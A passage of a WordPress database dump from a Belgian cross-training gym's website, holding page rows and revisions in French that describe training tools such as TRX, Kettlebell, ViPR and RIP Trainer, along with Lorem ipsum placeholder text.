outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-75\" alt=\"ript\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\" width=\"200\" height=\"200\" /></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'publish', 'closed', 'open', '', 'le-cross-training', '', '', '2013-11-03 10:12:44', '2013-11-03 10:12:44', '', 0, 'http://www.crosstrainingcenter.be/?page_id=22', 0, 'page', '', 0),
(23, 1, '2013-05-24 14:34:02', '2013-05-24 14:34:02', '', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-05-24 14:34:02', '2013-05-24 14:34:02', '', 22, 'http://www.crosstrainingcenter.be/?p=23', 0, 'revision', '', 0),
(24, 1, '2013-05-24 14:34:58', '2013-05-24 14:34:58', ' ', '', '', 'publish', 'open', 'open', '', '24', '', '', '2013-11-03 09:49:54', '2013-11-03 09:49:54', '', 0, 'http://www.crosstrainingcenter.be/?p=24', 2, 'nav_menu_item', '', 0),
(25, 1, '2013-05-24 14:34:58', '2013-05-24 14:34:58', '', 'L\'équipe', '', 'publish', 'open', 'open', '', 'lequipe', '', '', '2013-11-03 09:49:54', '2013-11-03 09:49:54', '', 0, 'http://www.crosstrainingcenter.be/?p=25', 6, 'nav_menu_item', '', 0),
(26, 1, '2013-05-23 19:28:51', '2013-05-23 19:28:51', '<h1>Prise de RDV :</h1>\r\nblablabla', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-05-23 19:28:51', '2013-05-23 19:28:51', '', 9, 'http://www.crosstrainingcenter.be/?p=26', 0, 'revision', '', 0),
(27, 1, '2013-05-24 14:33:49', '2013-05-24 14:33:49', 'blabla', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-2', '', '', '2013-05-24 14:33:49', '2013-05-24 14:33:49', '', 20, 'http://www.crosstrainingcenter.be/?p=27', 0, 'revision', '', 0),
(28, 1, '2013-05-24 14:34:07', '2013-05-24 14:34:07', 'définition, historique', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-05-24 14:34:07', '2013-05-24 14:34:07', '', 22, 'http://www.crosstrainingcenter.be/?p=28', 0, 'revision', '', 0),
(29, 1, '2013-05-23 19:28:51', '2013-05-23 19:28:51', '<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i><i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i><i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i><i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-05-23 19:28:51', '2013-05-23 19:28:51', '', 11, 'http://www.crosstrainingcenter.be/?p=29', 0, 'revision', '', 0),
(30, 1, '2013-05-23 19:28:51', '2013-05-23 19:28:51', '<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>\r\n\r\n<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>\r\n\r\n<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-05-23 19:28:51', '2013-05-23 19:28:51', '', 5, 'http://www.crosstrainingcenter.be/?p=30', 0, 'revision', '', 0),
(32, 1, '2013-07-10 16:11:47', '2013-07-10 16:11:47', '<blockquote>\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\n</blockquote>\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …).\n<h2></h2>\n&nbsp;\n<div class=\"arrondi\">\n<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr>\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></td>\n<td style=\"border: 0px; padding: 5px;\">\n<h1>TRX Suspension Training</h1>\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\n</tr>\n</tbody>\n</table>\n</div>\n&nbsp;\n<div class=\"arrondi\">\n<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr>\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></td>\n<td style=\"border: 0px; padding: 5px;\">\n<h1>Kettlebell</h1>\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\n</tr>\n</tbody>\n</table>\n</div>\n&nbsp;\n<div class=\"arrondi\">\n<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr>\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></td>\n<td style=\"border: 0px; padding: 5px;\">\n<h1>ViPR</h1>\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\n</tr>\n</tbody>\n</table>\n</div>\n&nbsp;\n<div class=\"arrondi\">\n<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr>\n<td style=\"border: 0px; padding: 5px;\"><img class=\"alignnone  wp-image-75\" alt=\"ript\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\" width=\"200\" height=\"200\" /></td>\n<td style=\"border: 0px; padding: 5px;\">\n<h1>RIP Trainer</h1>\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\n</tr>\n</tbody>\n</table>\n</div>\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-autosave-v1', '', '', '2013-07-10 16:11:47', '2013-07-10 16:11:47', '', 22, 'http://www.crosstrainingcenter.be/?p=32', 0, 'revision', '', 0),
(31, 1, '2013-05-24 14:36:30', '2013-05-24 14:36:30', '<h1>Prise de RDV :</h1>\r\nblablabla', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-05-24 14:36:30', '2013-05-24 14:36:30', '', 9, 'http://www.crosstrainingcenter.be/?p=31', 0, 'revision', '', 0),
(40, 1, '2013-06-16 08:02:41', '2013-06-16 08:02:41', '« Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines. Afin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2><b>TRX Suspension Training </b></h2>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.\r\n<h2><b>Kettlebel</b></h2>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.\r\n<h2><b>ViPR</b></h2>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.\r\n<h2><b>RIP TRAINER</b></h2>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 08:02:41', '2013-06-16 08:02:41', '', 22, 'http://www.crosstrainingcenter.be/?p=40', 0, 'revision', '', 0),
(33, 1, '2013-05-24 14:36:30', '2013-05-24 14:36:30', 'définition, historique', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-05-24 14:36:30', '2013-05-24 14:36:30', '', 22, 'http://www.crosstrainingcenter.be/?p=33', 0, 'revision', '', 0),
(34, 1, '2013-05-24 14:36:30', '2013-05-24 14:36:30', '<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>\r\n\r\n<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut orci vel massa suscipit pulvinar. Nulla sollicitudin. Fusce varius, ligula non tempus aliquam, nunc turpis ullamcorper nibh, in tempus sapien eros vitae ligula. Pellentesque rhoncus nunc et augue. Integer id felis. Curabitur aliquet pellentesque diam. Integer quis metus vitae elit lobortis egestas. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Morbi vel erat non mauris convallis vehicula. Nulla et sapien. Integer tortor tellus, aliquam faucibus, convallis id, congue eu, quam. Mauris ullamcorper felis vitae erat. Proin feugiat, augue non elementum posuere, metus purus iaculis lectus, et tristique ligula justo vitae magna.</i> <i>Aliquam convallis sollicitudin purus. Praesent aliquam, enim at fermentum mollis, ligula massa adipiscing nisl, ac euismod nibh nisl eu lectus. Fusce vulputate sem at sapien. Vivamus leo. Aliquam euismod libero eu enim. Nulla nec felis sed leo placerat imperdiet. Aenean suscipit nulla in justo. Suspendisse cursus rutrum augue. Nulla tincidunt tincidunt mi. Curabitur iaculis, lorem vel rhoncus faucibus, felis magna fermentum augue, et ultricies lacus lorem varius purus. Curabitur eu amet.</i>\r\n\r\n<i>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Sed non risus. Suspendisse lectus tortor, dignissim sit amet, adipiscing nec, ultricies sed, dolor. Cras elementum ultrices diam. Maecenas ligula massa, varius a, semper congue, euismod non, mi. Proin porttitor, orci nec nonummy molestie, enim est eleifend mi, non fermentum diam nisl sit amet erat. Duis semper. Duis arcu massa, scelerisque vitae, consequat in, pretium a, enim. Pellentesque congue. Ut in risus volutpat libero pharetra tempor. Cras vestibulum bibendum augue. Praesent egestas leo in pede. Praesent blandit odio eu enim. Pellentesque sed dui ut augue blandit sodales. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aliquam nibh. Mauris ac mauris sed pede pellentesque fermentum. Maecenas adipiscing ante non diam sodales hendrerit.</i> <i>Ut velit mauris, egestas sed, gravida nec, ornare ut, mi. Aenean ut 